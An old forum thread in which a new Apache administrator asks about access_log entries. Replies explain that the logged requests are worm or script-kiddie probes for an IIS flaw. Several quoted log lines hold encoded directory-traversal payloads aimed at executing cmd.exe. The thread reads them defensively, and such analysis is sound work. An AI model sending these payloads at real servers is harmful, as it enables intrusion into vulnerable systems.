Apache access_log question

WorldBuilder · 10-31-2003, 07:24 PM

What do entries like these mean in the access_log file?

Code:

127.0.0.1 - - [31/Oct/2003:14:49:58 -0800] "GET /~eliteboo/ HTTP/1.1" 403 309 
192.168.0.5 - - [31/Oct/2003:14:50:01 -0800] "GET /~eliteboo/ HTTP/1.1" 403 309 
192.168.0.5 - - [31/Oct/2003:14:50:01 -0800] "GET /favicon.ico HTTP/1.1" 404 306

Are they errors or are they just informative? I'm a little new to apache. What exactly are these entries telling me, I mean, What is the GET, ~eliteboo, 403, 306, etc... Thanks!

Chris

WorldBuilder · 10-31-2003, 07:39 PM

If I tail -f the access_log file, I constantly see these types of messages appear. When I try to ping or traceroute the IP addresses mentioned, they are always timing out. What are these?! Ugh, it's annoying...

Chris

zaphodiv · 10-31-2003, 07:56 PM

What about those entrys do you find unusuall?
127.0.0.1 is your computer, 192.168.0.5 is a reserved for LAN ip address.
Favicon.ico is an internet explorer 'feature'. It trys to get an icon to use in the favourites list (and elsewhere in IE6+)

WorldBuilder · 10-31-2003, 08:06 PM

Sorry... Those were bad examples... Stuff like this is more troublesome...

Code:

24.98.20.14 - - [08/Jun/2003:14:40:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.98.20.14 - - [08/Jun/2003:14:40:54 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.98.20.14 - - [08/Jun/2003:14:40:57 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.98.20.14 - - [08/Jun/2003:14:40:59 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.98.20.14 - - [08/Jun/2003:14:41:11 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
24.98.20.14 - - [08/Jun/2003:14:41:13 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
24.98.20.14 - - [08/Jun/2003:14:41:15 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.98.20.14 - - [08/Jun/2003:14:41:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

What is all that?

zaphodiv · 10-31-2003, 08:19 PM

Yawn, another Frequently Asked Question.

That is probably a windows machine which is infected with the codered virus, it might be a different virus/worm which uses the same exploit or a script kid.

It is an exploit for IIS, (internet information server), microsoft's very insecure web server software.

WorldBuilder · 11-01-2003, 05:24 AM

Thus why it's seemingly attempting to access a MS directory (../winnt/system32/cmd.exe)? Ok, I'm fine then. Thanks! I was just making sure that something wasn't actually getting IN. Sorry if it was a stupid question, zaphodiv, but I did search for access_log and apache". After 15 minutes of searching, I gave up.

Pete M · 11-01-2003, 06:30 AM

cjwsb

Just did a search on Yahoo using the following line, it provides a wealth of information

"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304"

Pete

WorldBuilder · 11-01-2003, 06:05 PM

Thx, Pete...

Googled that and you're right... A wealth!

Chris